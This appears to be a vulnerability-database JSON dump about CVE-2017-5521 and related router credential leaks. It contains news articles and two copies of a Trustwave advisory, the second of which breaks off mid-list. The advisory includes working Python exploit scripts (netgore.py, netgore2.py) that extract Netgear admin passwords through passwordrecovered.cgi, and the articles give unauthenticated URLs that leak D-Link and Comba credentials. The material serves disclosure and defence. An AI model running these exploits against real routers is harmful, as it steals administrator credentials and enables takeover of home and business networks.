earn researchers cash rewards of up to $15,000 for finding and responsibly reporting flaws in its hardware, APIs, and the mobile apps.\n", "modified": "2017-01-31T09:07:00", "published": "2017-01-30T21:59:00", "id": "THN:F5020205F527B28821065409F4534D5B", "href": "https://thehackernews.com/2017/01/Netgear-router-password-hacking.html", "type": "thn", "title": "Check If Your Netgear Router is also Vulnerable to this Password Bypass Flaw", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-09-10T17:38:31", "bulletinFamily": "info", "cvelist": ["CVE-2017-5521"], "description": "[](<https://1.bp.blogspot.com/-Hv8gS6psX3o/XXfQhpIVjCI/AAAAAAAA1BM/kUTpkqtjh_oFJal18sO7WB-p9ZoYW-NsQCLcBGAs/s728-e100/router-password-hacking.jpg>)\n\nWhat could be worse than your router leaking its administrative login credentials in plaintext? \n \nCybersecurity researchers from Trustwave's SpiderLabs have discovered multiple security vulnerabilities in some router models from two popular manufacturers\u2014D-Link and Comba Telecom\u2014that involve insecure storage of credentials, potentially affecting every user and system on that network. \n \nResearcher Simon Kenin told The Hacker News that he discovered a total of five vulnerabilities\u2014two in a D-Link DSL modem typically installed to connect a home network to an ISP, and three in multiple Comba Telecom WiFi devices. \n\n\n \nThese flaws could potentially allow attackers to change your device settings, extract sensitive information, perform MitM attacks, redirect you to phishing or malicious sites and launch many more types of attacks. \n \n\n\n> \"Since your router is the gateway in and out of your entire network it can potentially affect every user and system on that network. An attacker-controlled router can manipulate how your users resolve DNS hostnames to direct your users to malicious websites,\" Kenin says in a [blog post](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/multiple-vulnerabilities-in-comba-and-d-link-routers/>) published today.\n\n \nKenin is the same security researcher who previously discovered similar vulnerability (CVE-2017-5521) in at least [31 models of Netgear routers](<https://thehackernews.com/2017/01/Netgear-router-password-hacking.html>), allowing remote hackers to obtain the admin password of the affected devices and potentially affecting over one million Netgear customers. \n \n\n\n## D-Link WiFi Router Vulnerabilities\n\n \nThe first vulnerability resides in the dual-band D-Link DSL-2875AL wireless router, where a file located at https://[router ip address]/romfile.cfg contains login password of the device in plaintext and can be accessed by anyone with access to the web-based management IP address, without requiring any authentication. \n \n\n\n[](<https://1.bp.blogspot.com/-jlFF5B7QcJ0/XXfM3EXSPOI/AAAAAAAA1BA/n5Wi0j8UQ8wmb5Uv_j_RdqyJZWsIyyxKwCLcBGAs/s728-e100/router-hacking.jpg>)\n\n \nThe second vulnerability impacts D-Link DSL-2875AL and the DSL-2877AL models and leaks the username and password the targeted router use for authenticating with the Internet Service Provider (ISP). \n \nAccording to the researchers, a local attacker connected to the vulnerable router or a remote attacker, in case of the router is exposed to the Internet, can obtain victims' ISP credentials just by looking at the source code (HTML) of the router login page at https://[router ip address]/index.asp. \n \n\n\n> \"The following username & password are used by the user to connect to his ISP, leaking this info could allow an attacker to use those credentials for himself and abuse the ISP,\" the advisory for the flaw explains.\n\n \n\n\n> \"On top of that, bad security habits of password reuse could possibly allow an attacker to gain control of the router itself.\"\n\n \n\n\n \nResearchers notified D-Link of the vulnerabilities in early January, but the company released Firmware patches on September 6, just three days prior to the full disclosure of the issues. \n \n\n\n## Comba Wi-Fi Access Controller Vulnerabilities\n\n \nOut of three, the first vulnerability impacts the Comba AC2400 WiFi Access Controller, leaking the MD5 hash of the device password just by accessing the following URL without requiring any authentication. \n \n\n\n> https://[router ip address]/09/business/upgrade/upcfgAction.php?download=true\n\n \n\"The username is admin, with system privileges and the md5 of his password is 61d217fd8a8869f6d26887d298ce9a69 (trustwave). MD5 is very easy to break, if SSH/Telnet is enabled, this could lead to a full takeover of the filesystem of the device,\" the advisory reads. \n \n\n\n[](<https://1.bp.blogspot.com/-bnLepqqvOHY/XXfM23xe2PI/AAAAAAAA1A8/0fnNFS9viCIjCmJUWg-PNXiz71tjndyDQCLcBGAs/s728-e100/router-hacking-1.jpg>)\n\n \nThe other two vulnerabilities impact the Comba AP2600-I WiFi Access Point (version A02,0202N00PD2). \n \nOne of these flaws also leaks MD5 hash of the device username and password through the source code of the web-based management login page, while the other one leaks credentials in plaintext stored in an SQLite database file located at https://[router ip address]/goform/downloadConfigFile. \n \nResearchers attempted to contact Comba Telecom multiple times since February this year, but never succeeded in receiving a response. \n \nAll the three vulnerabilities discovered in Comba Telecom routers are unpatched at the time of writing, and it remains unknown whether the company has any plan to address them or not.\n", "modified": "2019-09-10T16:42:31", "published": "2019-09-10T16:41:00", "id": "THN:4EBD42C3757E080E11C736252B193432", "href": "https://thehackernews.com/2019/09/router-password-hacking.html", "type": "thn", "title": "Some D-Link and Comba WiFi Routers Leak Their Passwords in Plaintext", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2017-01-31T19:04:16", "description": "", "published": "2017-01-31T00:00:00", "type": "packetstorm", "title": "Netgear Router Password Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5521"], "modified": "2017-01-31T00:00:00", "id": "PACKETSTORM:140844", "href": "https://packetstormsecurity.com/files/140844/Netgear-Router-Password-Disclosure.html", "sourceData": "`Trustwave SpiderLabs Security Advisory TWSL2017-003: \nMultiple Vulnerabilities in NETGEAR Routers \n \nPublished: 01/30/2017 \nVersion: 1.0 \n \nVendor: NETGEAR (http://www.netgear.com/) \nProduct: Multiple products \n \nFinding 1: Remote and Local Password Disclosure \nCredit: Simon Kenin of Trustwave SpiderLabs \nCVE: CVE-2017-5521 \n \nVersion affected: \n \n# AC1450 V1.0.0.34_10.0.16 (Latest) \n# AC1450 V1.0.0.22_1.0.10 \n# AC1450 V1.0.0.14_1.0.6 \n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected) \n# D6400 V1.0.0.34_1.3.34 \n# D6400 V1.0.0.38_1.1.38 \n# D6400 V1.0.0.22_1.0.22 \n# DC112A V1.0.0.30_1.0.60 (Latest) \n# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected) \n# JNDR3000 V1.0.0.18_1.0.16 (Latest) \n# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected) \n# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected) \n# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected) \n# R6300 V1.0.2.78_1.0.58 (Latest) \n# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched) \n# R6300v2 V1.0.3.30_10.0.73 \n# R6700 V1.0.1.14_10.0.29 (Latest beta) \n# R6700 V1.0.0.26_10.0.26 (Latest stable) \n# R6700 V1.0.0.24_10.0.18 \n# R6900 V1.0.0.4_1.0.10 (Latest) \n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched) \n# R8300 V1.0.2.48_1.0.52 \n# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched) \n# R8500 V1.0.2.26_1.0.41 \n# R8500 V1.0.0.56_1.0.28 \n# R8500 V1.0.0.20_1.0.11 \n# VEGN2610 V1.0.0.35_1.0.35 (Latest) \n# VEGN2610 V1.0.0.29_1.0.29 \n# VEGN2610 V1.0.0.27_1.0.27 \n# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected) \n# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected) \n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest) \n# WNDR4000 V1.0.2.4_9.1.86 (Latest) \n# WNDR4500 V1.0.1.40_1.0.68 (Latest) \n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest) \n# WNDR4500v2 V1.0.0.42_1.0.25 \n# WGR614v10 V1.0.2.60_60.0.85NA (Latest) \n# WGR614v10 V1.0.2.58_60.0.84NA \n# WGR614v10 V1.0.2.54_60.0.82NA \n# WN3100RP V1.0.0.14_1.0.19 (Latest) \n# WN3100RP V1.0.0.6_1.0.12 \n \n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest) \n# Lenovo R3220 V1.0.0.13_1.0.13 \n \n \nProduct description: \nMultiple Netgear Routers \n \nMany Netgear routers are prone to password disclosure via simple crafted \nrequests to the web management server. The bug is exploitable remotely if the \nremote management option is set and can also be exploited given access to the \nrouter over LAN or WLAN. \n \nWhen trying to access the web panel a user is asked to authenticate, if the \nauthentication is cancelled and password recovery is not enabled, the user is \nredirected to a page which exposes a password recovery token. If a user \nsupplies the correct token to the page \nhttp://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not \nenabled), they will receive the admin password for the router. \n \nIf password recovery is set the exploit will fail, as it will ask the user for the recovery \nquestions which were previously set when enabling the feature, this is \npersistent, even after disabling the recovery option the exploit will fail, \nbecause the router will ask for the security questions. \nThis can easily be reproduced using the attached poc, or by sending these two \nsimple requests via the browser: \n1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token \n2. http://router/passwordrecovered.cgi?id=TOKEN will give you credentials (some models require you to send a post request instead of get) \n \n## netgore.py \nimport sys \nimport requests \n \n \ndef scrape(text, start_trig, end_trig): \nif text.find(start_trig) != -1: \nreturn text.split(start_trig, 1)[-1].split(end_trig, 1)[0] \nelse: \nreturn \"i_dont_speak_english\" \n#disable nasty insecure ssl warning \nrequests.packages.urllib3.disable_warnings() \n#1st stage - get token \nip = sys.argv[1] \nport = sys.argv[2] \nurl = 'http://' + ip + ':' + port + '/' \ntry: \nr = requests.get(url) \nexcept: \nurl = 'https://' + ip + ':' + port + '/' \nr = requests.get(url, verify=False) \nmodel = r.headers.get('WWW-Authenticate') \nif model is not None: \nprint \"Attcking: \" + model[13:-1] \nelse: \nprint \"not a netgear router\" \nsys.exit(0) \ntoken = scrape(r.text, 'unauth.cgi?id=', '\\\"') \nif token == 'i_dont_speak_english': \nprint \"not vulnerable\" \nsys.exit(0) \nprint \"token found: \" + token \n#2nd stage - pass the token - get the password \nurl = url + 'passwordrecovered.cgi?id=' + token \nr = requests.post(url, verify=False) \n#profit \nif r.text.find('left\\\">') != -1: \nusername = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>'))) \nusername = scrape(username, '>', '\\'') \npassword = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>'))) \npassword = scrape(password, '>', '\\'') \nif username == \"i_dont_speak_english\": \nusername = (scrape(r.text[r.text.find('left\\\">'):-1], 'left\\\">', '</td>')) \npassword = (scrape(r.text[r.text.rfind('left\\\">'):-1], 'left\\\">', '</td>')) \nelse: \nprint \"not vulnerable becuse password recovery IS set\" \nsys.exit(0) \n#html encoding pops out of nowhere, lets replace that \npassword = password.replace(\"#\",\"#\") \npassword = password.replace(\"&\",\"&\") \nprint \"user: \" + username \nprint \"pass: \" + password \n \n================================ \nJust run the PoC against a router to get the credentials if it is vulnerable. \n \n \n \nFinding 2: Remote and Local Password Disclosure \nCredit: Simon Kenin of Trustwave SpiderLabs \nCVE: CVE-2017-5521 \n \nVersion affected: \n \n# AC1450 V1.0.0.34_10.0.16 (Latest) \n# AC1450 V1.0.0.22_1.0.10 \n# AC1450 V1.0.0.14_1.0.6 \n# D6300 V1.0.0.96_1.1.96 (Latest) \n# D6300B V1.0.0.36_1.0.36 \n# D6300B V1.0.0.32_1.0.32 \n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched) \n# D6400 V1.0.0.22_1.0.22 \n# DC112A V1.0.0.30_1.0.60 (Latest) \n# DGN2200v4 V1.0.0.76_1.0.76 (Latest) \n# DGN2200v4 V1.0.0.66_1.0.66 \n# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest) \n# JNDR3000 V1.0.0.18_1.0.16 (Latest) \n# R6200 V1.0.1.56_1.0.43 (Latest) \n# R6200 V1.0.1.52_1.0.41 \n# R6200 V1.0.1.48_1.0.37 \n# R6200v2 V1.0.3.10_10.1.10 (Latest) \n# R6200v2 V1.0.1.20_1.0.18 \n# R6250 V1.0.4.6_10.1.12 (Latest beta) \n# R6250 V1.0.4.2_10.1.10 (Latest stable) \n# R6250 V1.0.1.84_1.0.78 \n# R6300 V1.0.2.78_1.0.58 (Latest) \n# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched) \n# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.) \n# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched) \n# R6700 V1.0.0.26_10.0.26 (Latest) \n# R6700 V1.0.0.24_10.0.18 \n# R6900 V1.0.0.4_1.0.10 (Latest) \n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched) \n# R7000 V1.0.4.30_1.1.67 \n# R7900 V1.0.1.8_10.0.14 (Latest beta) \n# R7900 V1.0.1.4_10.0.12 (Latest stable) \n# R7900 V1.0.0.10_10.0.7 \n# R7900 V1.0.0.8_10.0.5 \n# R7900 V1.0.0.6_10.0.4 \n# R8000 V1.0.3.26_1.1.18 (Latest beta) \n# R8000 V1.0.3.4_1.1.2 (Latest stable) \n# R8300 V1.0.2.48_1.0.52 \n# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched) \n# R8500 V1.0.2.30_1.0.43 \n# VEGN2610 V1.0.0.35_1.0.35 (Latest) \n# VEGN2610 V1.0.0.27_1.0.27 \n# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest) \n# VEVG2660 V1.0.0.23_1.0.23 \n# WNDR3400v2 V1.0.0.52_1.0.81 (Latest) \n# WNDR3400v3 V1.0.1.4_1.0.52 (Latest) \n# WNDR3400v3 V1.0.1.2_1.0.51 \n# WNDR3400v3 V1.0.0.22_1.0.29 \n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest) \n# WNDR4000 V1.0.2.4_9.1.86 (Latest) \n# WNDR4500 V1.0.1.40_1.0.68 (Latest) \n# WNDR4500 V1.0.1.6_1.0.24 \n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest) \n# WNDR4500v2 V1.0.0.50_1.0.30 \n# WNR1000v3 V1.0.2.68_60.0.93NA (Latest) \n# WNR1000v3 V1.0.2.62_60.0.87 (Latest) \n# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest) \n# WNR3500Lv2 V1.2.0.32_40.0.74 \n# WGR614v10 V1.0.2.60_60.0.85NA (Latest) \n# WGR614v10 V1.0.2.58_60.0.84NA \n# WGR614v10 V1.0.2.54_60.0.82NA \n \n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest) \n# Lenovo R3220 V1.0.0.13_1.0.13 \n \n \nMany Netgear routers are prone to password disclosure via simple crafted \nrequest to the web management server. The bug is exploitable remotely if the \nremote management option is set and can also be exploited given access to the \nrouter over LAN or WLAN. \n \nNetgear routers have an option to restore forgotten password via 2 security \nquestions. If the recovery option is disabled (which is the default), it is \nstill possible to recover the password by sending a correct token to the \nrecovery page. \n \nIf a user supplies the correct token to the page \nhttp://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not \nenabled), they will receive the admin password for the router. If password \nrecovery is set the exploit will fail, as it will ask the user for the recovery \nquestions which were previously set when enabling the feature, this is \npersistent, even after disabling the recovery option, the exploit will fail, \nbecause the router will ask for the security questions. \n \nThis mechanism does not work correctly on the very first request to \n\"passwordrecovered.cgi\" and the token is not properly checked, this means that \nany TOKEN value will result in disclosure of the password. \nThe issue occurs after every reboot of the router. \n \nThis can easily be reproduced using the attached poc, or by sending a simple \nrequest via the browser: \n1. http://router/passwordrecovered.cgi?id=Trustwave_SpiderLabs will give you credentials (some models require you to send a post request instead of get) \n \n## netgore2.py \nimport sys \nimport requests \n \ndef scrape(text, start_trig, end_trig): \nif text.find(start_trig) != -1: \nreturn text.split(start_trig, 1)[-1].split(end_trig, 1)[0] \nelse: \nreturn \"i_dont_speak_english\" \n#disable nasty insecure ssl warning \nrequests.packages.urllib3.disable_warnings() \n#1st stage \nip = sys.argv[1] \nport = sys.argv[2] \nurl = 'http://' + ip + ':' + port + '/' \ntry: \nr = requests.get(url) \nexcept: \nurl = 'https://' + ip + ':' + port + '/' \nr = requests.get(url, verify=False) \nmodel = r.headers.get('WWW-Authenticate') \nif model is not None: \nprint \"Attcking: \" + model[13:-1] \nelse: \nprint \"not a netgear router\" \nsys.exit(0) \n#2nd stage \nurl = url + 'passwordrecovered.cgi?id=get_rekt' \ntry: \nr = requests.post(url, verify=False) \nexcept: \nprint \"not vulnerable router\" \nsys.exit(0) \n#profit \nif r.text.find('left\\\">') != -1: \nusername = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>'))) \nusername = scrape(username, '>', '\\'') \npassword = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>'))) \npassword = scrape(password, '>', '\\'') \nif username == \"i_dont_speak_english\": \nusername = (scrape(r.text[r.text.find('left\\\">'):-1], 'left\\\">', '</td>')) \npassword = (scrape(r.text[r.text.rfind('left\\\">'):-1], 'left\\\">', '</td>')) \nelse: \nprint \"not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again\" \nsys.exit(0) \n#html encoding pops out of nowhere, lets replace that \npassword = password.replace(\"#\",\"#\") \npassword = password.replace(\"&\",\"&\") \nprint \"user: \" + username \nprint \"pass: \" + password \n \n================================ \nJust run the PoC against a router to get the credentials if it is vulnerable. \n \n \n \n \nRemediation Steps: \nPlease see NETGEAR's KBA for list of firmware patches for various models. As a \nworkaround, the bug only works when password recovery is NOT set. If you do set \npassword recovery this is not exploitable. \n \nRevision History: \n04/06/2016 - Vulnerability disclosed to vendor \n04/19/2016 - Request for update and received confirmation of receipt of the advisories \n05/18/2016 - Request for update; no response \n07/14/2016 - Request for update \n07/15/2016 - Notice of patch for some models and workaround KBA received along with commitment towards 100% coverage \n10/17/2016 - Request for update \n12/15/2016 - Notice of intent to publish advisories \n01/04/2017 - Vendor responds with patch timeline and announcement of participation in Bugcrowd \n01/30/2017 - Advisory published \n \n \nReferences \n1. http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html \n2. https://www.exploit-db.com/exploits/32883/ \n3. http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability \n \n \nAbout Trustwave: \nTrustwave is the leading provider of on-demand and subscription-based \ninformation security and payment card industry compliance management \nsolutions to businesses and government entities throughout the world. For \norganizations faced with today's challenging data security and compliance \nenvironment, Trustwave provides a unique approach with comprehensive \nsolutions that include its flagship TrustKeeper compliance management \nsoftware and other proprietary security solutions. Trustwave has helped \nthousands of organizations--ranging from Fortune 500 businesses and large \nfinancial institutions to small and medium-sized retailers--manage \ncompliance and secure their network infrastructure, data communications and \ncritical information assets. Trustwave is headquartered in Chicago with \noffices throughout North America, South America, Europe, Africa, China and \nAustralia. For more information, visit https://www.trustwave.com \n \nAbout Trustwave SpiderLabs: \nSpiderLabs(R) is the advanced security team at Trustwave focused on \napplication security, incident response, penetration testing, physical \nsecurity and security research. The team has performed over a thousand \nincident investigations, thousands of penetration tests and hundreds of \napplication security tests globally. In addition, the SpiderLabs Research \nteam provides intelligence through bleeding-edge research and proof of \nconcept tool development to enhance Trustwave's products and services. \nhttps://www.trustwave.com/spiderlabs \n \nDisclaimer: \nThe information provided in this advisory is provided \"as is\" without \nwarranty of any kind. Trustwave disclaims all warranties, either express or \nimplied, including the warranties of merchantability and fitness for a \nparticular purpose. In no event shall Trustwave or its suppliers be liable \nfor any damages whatsoever including direct, indirect, incidental, \nconsequential, loss of business profits or special damages, even if \nTrustwave or its suppliers have been advised of the possibility of such \ndamages. Some states do not allow the exclusion or limitation of liability \nfor consequential or incidental damages so the foregoing limitation may not \napply. \n \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/140844/TWSL2017-003.txt"}], "zdt": [{"lastseen": "2018-04-13T01:51:16", "description": "Exploit for hardware platform in category web applications", "edition": 1, "published": "2017-01-30T00:00:00", "type": "zdt", "title": "Netgear Routers - Password Disclosure Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5521"], "modified": "2017-01-30T00:00:00", "href": "https://0day.today/exploit/description/26837", "id": "1337DAY-ID-26837", "sourceData": "Trustwave SpiderLabs Security Advisory TWSL2017-003:\r\nMultiple Vulnerabilities in NETGEAR Routers\r\n \r\nPublished: 01/30/2017\r\nVersion: 1.0\r\n \r\nVendor: NETGEAR (http://www.netgear.com/)\r\nProduct: Multiple products\r\n \r\nFinding 1: Remote and Local Password Disclosure\r\nCredit: Simon Kenin of Trustwave SpiderLabs\r\nCVE: CVE-2017-5521\r\n \r\nVersion affected: \r\n \r\n# AC1450 V1.0.0.34_10.0.16 (Latest)\r\n# AC1450 V1.0.0.22_1.0.10\r\n# AC1450 V1.0.0.14_1.0.6\r\n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)\r\n# D6400 V1.0.0.34_1.3.34\r\n# D6400 V1.0.0.38_1.1.38\r\n# D6400 V1.0.0.22_1.0.22\r\n# DC112A V1.0.0.30_1.0.60 (Latest)\r\n# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)\r\n# JNDR3000 V1.0.0.18_1.0.16 (Latest)\r\n# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)\r\n# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)\r\n# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)\r\n# R6300 V1.0.2.78_1.0.58 (Latest)\r\n# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)\r\n# R6300v2 V1.0.3.30_10.0.73\r\n# R6700 V1.0.1.14_10.0.29 (Latest beta)\r\n# R6700 V1.0.0.26_10.0.26 (Latest stable)\r\n# R6700 V1.0.0.24_10.0.18\r\n# R6900 V1.0.0.4_1.0.10 (Latest)\r\n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)\r\n# R8300 V1.0.2.48_1.0.52\r\n# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)\r\n# R8500 V1.0.2.26_1.0.41\r\n# R8500 V1.0.0.56_1.0.28\r\n# R8500 V1.0.0.20_1.0.11\r\n# VEGN2610 V1.0.0.35_1.0.35 (Latest)\r\n# VEGN2610 V1.0.0.29_1.0.29\r\n# VEGN2610 V1.0.0.27_1.0.27\r\n# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)\r\n# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)\r\n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)\r\n# WNDR4000 V1.0.2.4_9.1.86 (Latest)\r\n# WNDR4500 V1.0.1.40_1.0.68 (Latest)\r\n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)\r\n# WNDR4500v2 V1.0.0.42_1.0.25\r\n# WGR614v10 V1.0.2.60_60.0.85NA (Latest)\r\n# WGR614v10 V1.0.2.58_60.0.84NA\r\n# WGR614v10 V1.0.2.54_60.0.82NA\r\n# WN3100RP V1.0.0.14_1.0.19 (Latest)\r\n# WN3100RP V1.0.0.6_1.0.12\r\n \r\n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)\r\n# Lenovo R3220 V1.0.0.13_1.0.13\r\n \r\n \r\nProduct description:\r\nMultiple Netgear Routers\r\n \r\nMany Netgear routers are prone to password disclosure via simple crafted \r\nrequests to the web management server. The bug is exploitable remotely if the \r\nremote management option is set and can also be exploited given access to the \r\nrouter over LAN or WLAN.\r\n \r\nWhen trying to access the web panel a user is asked to authenticate, if the \r\nauthentication is cancelled and password recovery is not enabled, the user is\r\nredirected to a page which exposes a password recovery token. If a user \r\nsupplies the correct token to the page \r\nhttp://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not\r\nenabled), they will receive the admin password for the router. \r\n \r\nIf password recovery is set the exploit will fail, as it will ask the user for the recovery \r\nquestions which were previously set when enabling the feature, this is\r\npersistent, even after disabling the recovery option the exploit will fail, \r\nbecause the router will ask for the security questions.\r\nThis can easily be reproduced using the attached poc, or by sending these two \r\nsimple requests via the browser:\r\n1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token\r\n2. http://router/passwordrecovered.cgi?id=TOKEN will give you credentials (some models require you to send a post request instead of get)\r\n \r\n## netgore.py\r\nimport sys\r\nimport requests\r\n \r\n \r\ndef scrape(text, start_trig, end_trig):\r\n if text.find(start_trig) != -1:\r\n return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]\r\n else:\r\n return \"i_dont_speak_english\"\r\n#disable nasty insecure ssl warning\r\nrequests.packages.urllib3.disable_warnings()\r\n#1st stage - get token\r\nip = sys.argv[1]\r\nport = sys.argv[2]\r\nurl = 'http://' + ip + ':' + port + '/'\r\ntry:\r\n r = requests.get(url)\r\nexcept:\r\n url = 'https://' + ip + ':' + port + '/'\r\n r = requests.get(url, verify=False)\r\nmodel = r.headers.get('WWW-Authenticate')\r\nif model is not None:\r\n print \"Attcking: \" + model[13:-1]\r\nelse:\r\n print \"not a netgear router\"\r\n sys.exit(0)\r\ntoken = scrape(r.text, 'unauth.cgi?id=', '\\\"')\r\nif token == 'i_dont_speak_english':\r\n print \"not vulnerable\"\r\n sys.exit(0)\r\nprint \"token found: \" + token\r\n#2nd stage - pass the token - get the password\r\nurl = url + 'passwordrecovered.cgi?id=' + token\r\nr = requests.post(url, verify=False)\r\n#profit\r\nif r.text.find('left\\\">') != -1:\r\n username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))\r\n username = scrape(username, '>', '\\'')\r\n password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))\r\n password = scrape(password, '>', '\\'')\r\n if username == \"i_dont_speak_english\":\r\n username = (scrape(r.text[r.text.find('left\\\">'):-1], 'left\\\">', '</td>'))\r\n password = (scrape(r.text[r.text.rfind('left\\\">'):-1], 'left\\\">', '</td>'))\r\nelse:\r\n print \"not vulnerable becuse password recovery IS set\"\r\n sys.exit(0)\r\n#html encoding pops out of nowhere, lets replace that\r\npassword = password.replace(\"#\",\"#\")\r\npassword = password.replace(\"&\",\"&\")\r\nprint \"user: \" + username\r\nprint \"pass: \" + password\r\n \r\n================================\r\nJust run the PoC against a router to get the credentials if it is vulnerable.\r\n \r\n \r\n \r\nFinding 2: Remote and Local Password Disclosure\r\nCredit: Simon Kenin of Trustwave SpiderLabs\r\nCVE: CVE-2017-5521\r\n \r\nVersion affected: \r\n \r\n# AC1450 V1.0.0.34_10.0.16 (Latest)\r\n# AC1450 V1.0.0.22_1.0.10\r\n# AC1450 V1.0.0.14_1.0.6\r\n# D6300 V1.0.0.96_1.1.96 (Latest)\r\n# D6300B V1.0.0.36_1.0.36\r\n# D6300B V1.0.0.32_1.0.32\r\n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)\r\n# D6400 V1.0.0.22_1.0.22\r\n# DC112A V1.0.0.30_1.0.60 (Latest)\r\n# DGN2200v4 V1.0.0.76_1.0.76 (Latest)\r\n# DGN2200v4 V1.0.0.66_1.0.66\r\n# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)\r\n# JNDR3000 V1.0.0.18_1.0.16 (Latest)\r\n# R6200 V1.0.1.56_1.0.43 (Latest)\r\n# R6200 V1.0.1.52_1.0.41\r\n# R6200 V1.0.1.48_1.0.37\r\n# R6200v2 V1.0.3.10_10.1.10 (Latest)\r\n# R6200v2 V1.0.1.20_1.0.18\r\n# R6250 V1.0.4.6_10.1.12 (Latest beta)\r\n# R6250 V1.0.4.2_10.1.10 (Latest stable)\r\n# R6250 V1.0.1.84_1.0.78 \r\n# R6300 V1.0.2.78_1.0.58 (Latest)\r\n# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)\r\n# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)\r\n# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)\r\n# R6700 V1.0.0.26_10.0.26 (Latest)\r\n# R6700 V1.0.0.24_10.0.18\r\n# R6900 V1.0.0.4_1.0.10 (Latest)\r\n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)\r\n# R7000 V1.0.4.30_1.1.67\r\n# R7900 V1.0.1.8_10.0.14 (Latest beta)\r\n# R7900 V1.0.1.4_10.0.12 (Latest stable)\r\n# R7900 V1.0.0.10_10.0.7\r\n# R7900 V1.0.0.8_10.0.5\r\n# R7900 V1.0.0.6_10.0.4\r\n# R8000 V1.0.3.26_1.1.18 (Latest beta)\r\n# R8000 V1.0.3.4_1.1.2 (Latest stable)\r\n# R8300 V1.0.2.48_1.0.52\r\n# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)\r\n# R8500 V1.0.2.30_1.0.43\r\n# VEGN2610 V1.0.0.35_1.0.35 (Latest)\r\n# VEGN2610 V1.0.0.27_1.0.27\r\n# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)\r\n# VEVG2660 V1.0.0.23_1.0.23\r\n# WNDR3400v2 V1.0.0.52_1.0.81 (Latest)\r\n# WNDR3400v3 V1.0.1.4_1.0.52 (Latest)\r\n# WNDR3400v3 V1.0.1.2_1.0.51\r\n# WNDR3400v3 